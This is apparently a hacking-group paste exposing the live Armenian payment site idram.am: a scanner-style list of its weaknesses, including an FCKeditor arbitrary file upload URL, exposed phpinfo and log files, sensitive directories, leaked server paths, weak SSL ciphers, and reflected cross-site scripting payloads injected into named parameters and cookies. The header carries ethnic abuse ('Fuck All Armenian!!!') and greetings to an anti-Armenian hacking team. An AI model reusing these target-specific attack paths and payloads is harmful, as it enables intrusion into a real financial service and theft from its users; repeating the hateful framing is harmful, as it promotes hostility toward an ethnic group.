idram.am mucked+fucked+packed+sucked+hacked+cracked

1. Salamlar. Men Avatar Fearless. Bu Gun Sizlere Tapdigim XSS Acigin gosterecem.
2. _____ __
3. / _ \___ _______ _/ |______ _______
4. / /_\ \ \/ /\__ \\ __\__ \\_ __ \
5. / | \ / / __ \| | / __ \| | \/
6. \____|__ /\_/ (____ /__| (____ /__|
7. \/ \/ \/
8.  
9.  
10. #Target Site : http://idram.am/
11. R3SP3CT T0 : All My Bro*S
12. Especially BOT_25
13. Gr33t`Z T0 : All Anti-armenia.ORG members & AA Team
14. Anti-armenia.ORG
15. Fuck All Armenian!!!
16. Video :
17. http://youtu.be/J0fBXM-zGFo
18. Images :
19. http://s13.postimage.org/cxw0a1646/idram.jpg
20. http://i026.radikal.ru/1207/54/5dcceaaf3330.png
21.  
22. Vulnerabilities :
23. +--------------------------------------------------------------------------------------------------------------------------------+
24. Insecure transition from HTTP to HTTPS in form post :
25. /
26. / (5d144d46073279bbdaefae2bc56f6d4d)
27. /index.php
28. /index.php (093e5196576bae758d31b492fa26c443)
29. /index.php (4884fbe73df571d23e705eba2c3449ee)
30. /index.php (4f6d79019ed3bc622402903d9ff7e4d2)
31. /index.php (5d144d46073279bbdaefae2bc56f6d4d)
32. /index.php (5e6d83c1b69b0be910b7fb68d28d431d)
33. /index.php (742372cf6944623faf985bef07990d99)
34. /index.php (84d8bb087daaacc71f3b02efaaae52e2)
35. /index.php (91918dbd3109a187ac6397af29e49880)
36. /index.php (fa8def2e93a70ffcc53e51b68f5ff902)
37. +--------------------------------------------------------------------------------------------------------------------------------+
38. |
39. +--------------------------------------------------------------------------------------------------------------------------------+
40. FCKeditor Arbitrary File Upload :
41. /fckeditor/editor/filemanager/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/
42. +--------------------------------------------------------------------------------------------------------------------------------+
43. |
44. +--------------------------------------------------------------------------------------------------------------------------------+
45. phpinfo() function :
46. /info.php
47. /images/info.php
48. +--------------------------------------------------------------------------------------------------------------------------------+
49. |
50. +--------------------------------------------------------------------------------------------------------------------------------+
51. Possible Sensitive Directories :
52. /fckeditor
53. /fckeditor/editor
54. /fckeditor/editor/_source
55. /fckeditor/editor/filemanager
56. /images/fckeditor
57. /images/mail
58. /images/temp
59. /images/upload
60. /polling/admin
61. /upload
62. +--------------------------------------------------------------------------------------------------------------------------------+
63. |
64. +--------------------------------------------------------------------------------------------------------------------------------+
65. Possible Sensetive Files :
66. /images/error_log
67. /images/info.txt
68. /info.txt
69. +--------------------------------------------------------------------------------------------------------------------------------+
70. |
71. +--------------------------------------------------------------------------------------------------------------------------------+
72. Session Cookie without Secure Flag Set :
73. Cookie name: "PHPSESSID"
74. Cookie domain: "idram.am"
75. +--------------------------------------------------------------------------------------------------------------------------------+
76. |
77. +--------------------------------------------------------------------------------------------------------------------------------+
78. Password type input with autocomplete enabled :
79. /
80. /index.php (093e5196576bae758d31b492fa26c443)
81. /index.php (4884fbe73df571d23e705eba2c3449ee)
82. /index.php (4f6d79019ed3bc622402903d9ff7e4d2)
83. /index.php (5e6d83c1b69b0be910b7fb68d28d431d)
84. /index.php (742372cf6944623faf985bef07990d99)
85. /index.php (84d8bb087daaacc71f3b02efaaae52e2)
86. /index.php (91918dbd3109a187ac6397af29e49880)
87. /index.php (fa8def2e93a70ffcc53e51b68f5ff902)
88. /index1.php
89. /polling/admin
90. /polling/admin/index.php
91. /polling/admin/index.php (dba2719d6248dd8f3dc76fd280b759f9)
92. +--------------------------------------------------------------------------------------------------------------------------------+
93. |
94. +--------------------------------------------------------------------------------------------------------------------------------+
95. require_once() FUnction error :
96. Warning: require_once(/home/www/vhosts/edram.am/www/htdocs/include/lng.php): failed to open stream: No such file or directory in /var/www/vhosts/idram.am/www/htdocs/images/include/define.php on line 121 Fatal error: require_once(): Failed opening required '/home/www/vhosts/edram.am/www/htdocs/include/lng.php' (include_path='.:/usr/share/pear:/usr/share/php') in /var/www/vhosts/idram.am/www/htdocs/images/include/define.php on line 121
97. +--------------------------------------------------------------------------------------------------------------------------------+
98. |
99. +--------------------------------------------------------------------------------------------------------------------------------+
100. http://www.idram.am/mootools/mootools.js
101. +--------------------------------------------------------------------------------------------------------------------------------+
102. |
103. +--------------------------------------------------------------------------------------------------------------------------------+
104. SSL Weak Ciphers:
105. Weak SSL ciphers (SSL3 on port 443):
106.  
107. SSL3_CK_RSA_DES_64_CBC_SHA - Low strength
108. SSL3_CK_EDH_RSA_DES_64_CBC_SHA - Low strength
109. +--------------------------------------------------------------------------------------------------------------------------------+
110. |
111. +--------------------------------------------------------------------------------------------------------------------------------+
112. List Of Open TCP Ports :
113. Description
114. Open Port 80 / http
115. Port Banner:
116.  
117. HTTP/1.1 200 OK
118. Date: Fri, 20 Jul 2012 23:22:14 GMT
119. Server: Apache
120. Last-Modified: Fri, 27 Apr 2012 09:57:21 GMT
121. ETag: "12e01a6-d-4bea62166f0ab"
122. Accept-Ranges: bytes
123. Content-Length: 13
124. Connection: close
125. Content-Type: text/html; charset=UTF-8
126. ...
127.  
128. --------------------------------------------------------------------------------
129.  
130. Open Port 443 / https
131. Port Banner:
132.  
133. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
134. <html><head>
135. <title>400 Bad Request</title>
136. </head><body>
137. <h1>Bad Request</h1>
138. <p>Your browser sent a request that this server could not understand.<br />
139. Reason: You're speaking plain HTTP to an SSL ...
140. +--------------------------------------------------------------------------------------------------------------------------------+
141. |
142. +--------------------------------------------------------------------------------------------------------------------------------+
143. Error_Log :
144. http://pastebin.com/qc9vY31K
145. +--------------------------------------------------------------------------------------------------------------------------------+
146. |
147. +--------------------------------------------------------------------------------------------------------------------------------+
148. Other Attack Method'S :
149. +--------------------------------------------------------------------------------------------------------------------------------+
150. This vulnerability affects /fckeditor/editor/filemanager/connectors/php/connector.php
151. URL encoded GET input CurrentFolder was set to 1<ScRiPt >prompt(976928)</ScRiPt>
152. +--------------------------------------------------------------------------------------------------------------------------------+
153. This Vulnerability Effects to /index.php
154. Cookie input idram_ID was set to ' onmouseover=prompt(964243) bad='
155. The input is reflected inside a tag element between single quotes.
156. _________________________________________________________________
157. URL encoded GET input level_id was set to " onmouseover=prompt(948434) bad="
158. The input is reflected inside a tag element between double quotes.
159. _________________________________________________________________
160. URL encoded GET input level_id was set to " onmouseover=prompt(917527) bad="
161. The input is reflected inside a tag element between double quotes.
162. _________________________________________________________________
163. URL encoded GET input level_id was set to " onmouseover=prompt(983304) bad="
164. The input is reflected inside a tag element between double quotes.
165. _________________________________________________________________
166. +--------------------------------------------------------------------------------------------------------------------------------+
167. This vulnerability affects /index1.php.
168. URI was set to "onmouseover=prompt(947127)>
169. The input is reflected inside a tag element between double quotes.
170. +--------------------------------------------------------------------------------------------------------------------------------+
171. This vulnerability affects /polling/admin/index.php.
172. URI was set to "onmouseover=prompt(965520)>
173. The input is reflected inside a tag element between double quotes.
174. +--------------------------------------------------------------------------------------------------------------------------------+
175. This vulnerability affects /.
176. URI was set to "onmouseover=prompt(947127)>
177. The input is reflected inside a tag element between double quotes.
178. +--------------------------------------------------------------------------------------------------------------------------------+